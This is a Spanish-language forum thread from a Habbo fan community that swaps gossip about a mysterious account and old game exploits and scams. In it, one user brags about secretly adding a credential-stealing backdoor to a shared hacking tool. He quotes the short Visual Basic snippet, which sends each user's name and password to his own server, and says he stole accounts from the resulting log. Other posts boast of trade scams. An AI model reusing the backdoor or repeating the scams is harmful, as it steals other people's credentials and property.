¡Advertencia!
Este tema no ha tenido respuestas en más de un mes. Recuerda que si deseas añadir una nueva debes cumplir con las normas de la web.
dsps le pregunto a thedarkchaos

¡Soy el fantasma de Habtium! Me dedico a reemplazar aquellas cuentas que han sido eliminadas. 👻
Y cuando se llego a desviar tanto el tema xD

Gracias por visitar mi perfil

bueno ya respondieron pero lo de que baneo a 2 del grupo de TheDarkChaos es MENTIRA xdd el utilizaba script con su clom en ese grupo y el script trataba de meter a el que uno quisiera en un grupo sin que ese se enterara por eso tenia muchos MODs y a volvoretta, arturo y tales pero luego lo banean por eso y sacan a casi todos los MODs de los que estaban en el grupo y a casi todos los ex staff xd el no baneo a nadie

ese "script" tambien existio (el de meter gente a los grupos xD)
angelBoy parece ke tenia un grupo con MODs, Staffs y otros kekos
cuando lo vea le pregunto pa ver si se acuerda del grupo xD

¡Soy el fantasma de Habtium! Me dedico a reemplazar aquellas cuentas que han sido eliminadas. 👻

ese "script" tambien existio (el de meter gente a los grupos xD)
angelBoy parece ke tenia un grupo con MODs, Staffs y otros kekos
cuando lo vea le pregunto pa ver si se acuerda del grupo xD

Tengo entendido que ese ''script'' era un simple bug de las paginas de grupo con el firebug de firefox(no me hagais mucho caso, pero lei algo de eso en este mismo foro xD)

Respecto a whatwasit tengo entendido que era un tester de habbo en .com :S  Lo lei en habborator o algo asi, si lo encuentro lo posteare xD

Tengo entendido que ese ''script'' era un simple bug de las paginas de grupo con el firebug de firefox(no me hagais mucho caso, pero lei algo de eso en este mismo foro xD)

De hecho, creo haber leído a 2 o 3 personas comentando respecto a lo de firebug xD... Pero me sorprende que una función de un programa pueda afectar un server de esa manera xD

sep, escribi "script" (entre comillas) xke si decia "bug de blablabla" nadie iva a entender xD
eso se hacia con el firebug, igual ke las notas invisibles, poner las cosas afuera del "bloque" del home y cosas asi
ami nunca me gustaron ese tipo de "exploits" (exploit = forma de explotar un bug xD) ya ke nunca supe hacerlos xD
todo el mundo podia acerlos menos yo >O<" (kisas soy muy lerdo pa entender el firebug)

y...

De hecho, creo haber leído a 2 o 3 personas comentando respecto a lo de firebug xD... Pero me sorprende que una función de un programa pueda afectar un server de esa manera xD

el firebug edita la forma en ke "tu" (tu navegador) ves una pagina web
cuando editas algo de tu home y luego grabas los cambios, grabas el codigo ke "ve" tu computador
y asi si le metes 1230230103 codes raros probablemente kede mas de alguno dentro de tu home

aparte del firebug hay otros complementos del firefox ke sirven muxo pal scripting xD
el ke mas me gusta ami es el "Live HTTP Headers" pa ver los "POST" y "GET" de los formularios en habbo

el firebug edita la forma en ke "tu" (tu navegador) ves una pagina web
cuando editas algo de tu home y luego grabas los cambios, grabas el codigo ke "ve" tu computador
y asi si le metes 1230230103 codes raros probablemente kede mas de alguno dentro de tu home

A eso me refiero.
Como una función de ese tipo podría editar un server? En el sentido de agregando moderadores y staffs a consola para que todos pudieran verlos :S...

Entonces q hacian en esos tiempos de scripters?

Soy Nightmares para los old school! besos

Entonces q hacian en esos tiempos de scripters?

FTW? redacta mejor la pregunta xD

eh.. hay muchos scripts ke duraron unas semanitas pero ke fueron divertidos y todavia habbo tiene "secuelas"

como el furni signing, en donde podias escribir "dentro" del packet del furni (solo los scripters podian leer sus mensajitos)
y jeax saco un AXED con una opcion de "firmar" todos los furnis de todas las salas
y gracias a eso hay MILES de vips firmados por Jeax en todos los hoteles de habbo XD

tambien una vez existio una forma de cambiarle el color a los furnis en la ventanita de trades
asi tradeaba drakos negros aciendolos pasar por dorados, rojos, plateados, etc, etc
ese script duro como 2 semanas pero gane como 150 vips tradeando hasta ke me banearon :B

otro script ke fue "legendario" fue el de los kekos sin nick
aunk no fue un script, solo era un keko con un alt code ke no tenia la Fuente de habbo (Volter)
y asi tu keko se veia sin nick XD
tambien duro pokisimo ya ke parcharon rapido lo de los alt codes y banearon a casi todos los kekos sin nick
gracias a esa "epoca" logre crear el keko "MOD-Hellsing" xD

y el mejor y mas cool script del mundo es el ke me hace ser HC infinito y gratis :juju:
(cada vez ke alguien me ve en habbo me pregunta si page por mi HC... es OBIO ke page por el xD, no soy dios >O<")

en fin... la vida es un ciclo y todo lo ke se va volvera algun dia :B
y si tienen suerte podran ver alguno de estos "trucos de magia" en su habbo-vida y diran "WOO KE COOL ESA WEA"

Rafa, Hellsing, Aszune, a todos nos interesa como era el script de antes, pero este no es el tema para charlarlo, no se desvíen.
Pues recordando esos viejos buenos tiempos de script.

Pero no desvirtuen.

El 90% de los primeros usuarios del hotel .es y de cualquier hotel están en otros hoteles Son jugadores que se crean users en todos los hoteles; tipo 'oa' en el .es y .com

Tiene a Krissy a aapo y a 4 MODS antiguos;
Si es personal de sulake (seguro)

Early 90s //
Estudiante de Máster en Turismo y Dirección Hotelera //
Barcelona
me interesa bastante el tema y las webadas lindas que hace Hellsing. xD

Yo creo que baje algo de Hellsing (como no, con virus xd) y de Zidkon

Tuve la suerte de verlo al Zid, pero cuando lo vi desapareció, creo que lo bann

Sobre el tema, no se quien es, pero los mods de su consola creo que son habbos normales con script

Y su home es tan simple porque en el 07 creo que hicieron la wea esta de las jomes

PD: sisi, uso mucho el
PD2: Mod-ErnestoC si era mod creo xd

Rafa, Hellsing, Aszune, a todos nos interesa como era el script de antes, pero este no es el tema para charlarlo, no se desvíen.

y cual es la idea original del post? hablar sobre "Whatwasit" o hablar sobre el keko de tmc con los mods en la conso xD?
si supieran redactar bien podria entender el "tema" de este thread >O<"

en fin... me dio risa esta frase xD

me interesa bastante el tema y las webadas lindas que hace Hellsing. xD

Yo creo que baje algo de Hellsing (como no, con virus xd) y de Zidkon

cuando zidkon fue secuestrado por la FARC (LOL) me dio el codigo fuente de su programa (zidkon 3.0)
y yo lo arregle y lo ise funkar por unas 5 o 6 actualizaciones mas
pero le meti un regalito al programa xD

If login = true then
Inet1.openurl(http://webdehellsing/log.php?user=" & text1.text & "&pass=" & text2.text)
else
msgbox("logeate bien nembo")
end if

y taraaan, me llegaban las pass de todos los ke usaron el zidkon alguna vez :B
pero ya ke no soy un adicto a habbo robaba a 1 entre 1000 tipos del log y nisikiera le ponia "hacked by hellsing" xD
al final terminaron unos 5 o 6 tipos metidos en mi log robando todo lo ke veian y ahi lo borre

ah... y pa no salirme del tema
ese Whatwasit debe ser uno de los chinos de sulake ke se metio a habbo pa ver como kedo su obra maestra xD
kisas despues le regalo su keko a alguna sobrina o a sus hijos y por eso tienen placas nuevas

y cual es la idea original del post? hablar sobre "Whatwasit" o hablar sobre el keko de tmc con los mods en la conso xD?
si supieran redactar bien podria entender el "tema" de este thread >O<"

en fin... me dio risa esta frase xD

cuando zidkon fue secuestrado por la FARC (LOL) me dio el codigo fuente de su programa (zidkon 3.0)
y yo lo arregle y lo ise funkar por unas 5 o 6 actualizaciones mas
pero le meti un regalito al programa xD

If login = true then
Inet1.openurl(http://webdehellsing/log.php?user=" & text1.text & "&pass=" & text2.text)
else
msgbox("logeate bien nembo")
end if

y taraaan, me llegaban las pass de todos los ke usaron el zidkon alguna vez :B
pero ya ke no soy un adicto a habbo robaba a 1 entre 1000 tipos del log y nisikiera le ponia "hacked by hellsing" xD
al final terminaron unos 5 o 6 tipos metidos en mi log robando todo lo ke veian y ahi lo borre

ah... y pa no salirme del tema
ese Whatwasit debe ser uno de los chinos de sulake ke se metio a habbo pa ver como kedo su obra maestra xD
kisas despues le regalo su keko a alguna sobrina o a sus hijos y por eso tienen placas nuevas

TIO Te admiro eres dios XD

Early 90s //
Barcelona

TIO Te admiro eres dios XD

No es Dios es el diablo!!! -.-

No es Dios es el diablo!!! -.-

Pues lo que sea pero le admiro
PD: Y tu eres un lucifer? xd

Early 90s //
Barcelona
Le preguntaré a Thedarkchaos sobre esto  ;D

Mientras... ¿me podrían dar el topic de lo del scripting?

puppet on a string

Pues lo que sea pero le admiro
PD: Y tu eres un lucifer? xd

Deberías leer más.